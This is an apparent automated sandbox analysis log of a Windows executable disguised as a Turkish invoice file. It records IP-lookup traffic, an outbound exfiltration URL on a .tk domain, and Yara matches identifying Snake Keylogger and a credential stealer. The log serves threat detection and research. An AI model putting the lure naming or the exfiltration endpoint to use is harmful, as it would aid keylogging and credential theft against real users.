Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49709 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.227.219 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: scratchdreams.tk

Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002AF3000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: FATURA VE BELGELER..exe	String found in binary or memory: http://tempuri.org/DataSetGen.xsd
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.227.219
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BB4000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.227.219$
Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: FATURA VE BELGELER..exe, 00000003.00000002.4444099763.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49725 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.FATURA VE BELGELER..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d5bfa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.FATURA VE BELGELER..exe.3d7c9c0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4443081084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6464, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: FATURA VE BELGELER..exe PID: 6368, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_028ADCD4	0_2_028ADCD4
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_04B211B8	0_2_04B211B8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_05037018	0_2_05037018
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_05030006	0_2_05030006
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_05030040	0_2_05030040
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_05037008	0_2_05037008
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CC44E8	0_2_06CC44E8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CCB638	0_2_06CCB638
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CC44D8	0_2_06CC44D8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CCD270	0_2_06CCD270
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CCB200	0_2_06CCB200
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CCB1F0	0_2_06CCB1F0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CC2F80	0_2_06CC2F80
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CC2F90	0_2_06CC2F90
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CCADC8	0_2_06CCADC8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 0_2_06CCBA70	0_2_06CCBA70
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281B388	3_2_0281B388
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281C1F0	3_2_0281C1F0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_02816168	3_2_02816168
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_02816790	3_2_02816790
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281C7B1	3_2_0281C7B1
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281C4D0	3_2_0281C4D0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281CA91	3_2_0281CA91
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_02814B31	3_2_02814B31
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_02819848	3_2_02819848
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281BF10	3_2_0281BF10
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281BC32	3_2_0281BC32
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281F4E8	3_2_0281F4E8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_028135C8	3_2_028135C8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281B552	3_2_0281B552
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281EA08	3_2_0281EA08
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281E9F8	3_2_0281E9F8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0281F941	3_2_0281F941
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06698A58	3_2_06698A58
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669CE28	3_2_0669CE28
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669DAC0	3_2_0669DAC0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669AEA8	3_2_0669AEA8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669BB38	3_2_0669BB38
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669C7D8	3_2_0669C7D8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669D478	3_2_0669D478
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669A858	3_2_0669A858
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669B4F0	3_2_0669B4F0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669908E	3_2_0669908E
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066915F8	3_2_066915F8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669C188	3_2_0669C188
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06695A68	3_2_06695A68
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06698A48	3_2_06698A48
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06695A58	3_2_06695A58
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06698600	3_2_06698600
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669CE18	3_2_0669CE18
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06695EC0	3_2_06695EC0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669DAAF	3_2_0669DAAF
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06695EB2	3_2_06695EB2
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669AE98	3_2_0669AE98
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06696760	3_2_06696760
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06696770	3_2_06696770
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669BB27	3_2_0669BB27
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06696308	3_2_06696308
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06696318	3_2_06696318
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066937FA	3_2_066937FA
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06696BC8	3_2_06696BC8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669C7CA	3_2_0669C7CA
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06696BB8	3_2_06696BB8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06693B80	3_2_06693B80
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06692C68	3_2_06692C68
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669D468	3_2_0669D468
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669A848	3_2_0669A848
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06690040	3_2_06690040
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06697020	3_2_06697020
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06693808	3_2_06693808
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06690006	3_2_06690006
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06697010	3_2_06697010
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066908E1	3_2_066908E1
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669B4E0	3_2_0669B4E0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066978E7	3_2_066978E7
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066978F8	3_2_066978F8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066908F0	3_2_066908F0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066974A0	3_2_066974A0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06690488	3_2_06690488
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06694880	3_2_06694880
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06690498	3_2_06690498
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06697490	3_2_06697490
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669C178	3_2_0669C178
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06690D48	3_2_06690D48
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06697D40	3_2_06697D40
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06697D50	3_2_06697D50
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06690D38	3_2_06690D38
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066955E8	3_2_066955E8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066985F1	3_2_066985F1
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066955DA	3_2_066955DA
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066981A8	3_2_066981A8
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066911A0	3_2_066911A0
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_0669819A	3_2_0669819A
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_06691191	3_2_06691191
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066BBFEC	3_2_066BBFEC
Source: C:\Users\user\Desktop\FATURA VE BELGELER..exe	Code function: 3_2_066BDC48	3_2_066BDC48

Source: FATURA VE BELGELER..exe, 00000000.00000002.1990719026.00000000051B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1988410714.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1989511626.0000000003C8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FATURA VE BELGELER..exe
Source: FATURA VE BELGELER..exe, 00000000.00000002.1991075872.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FATURA VE BELGELER..exe
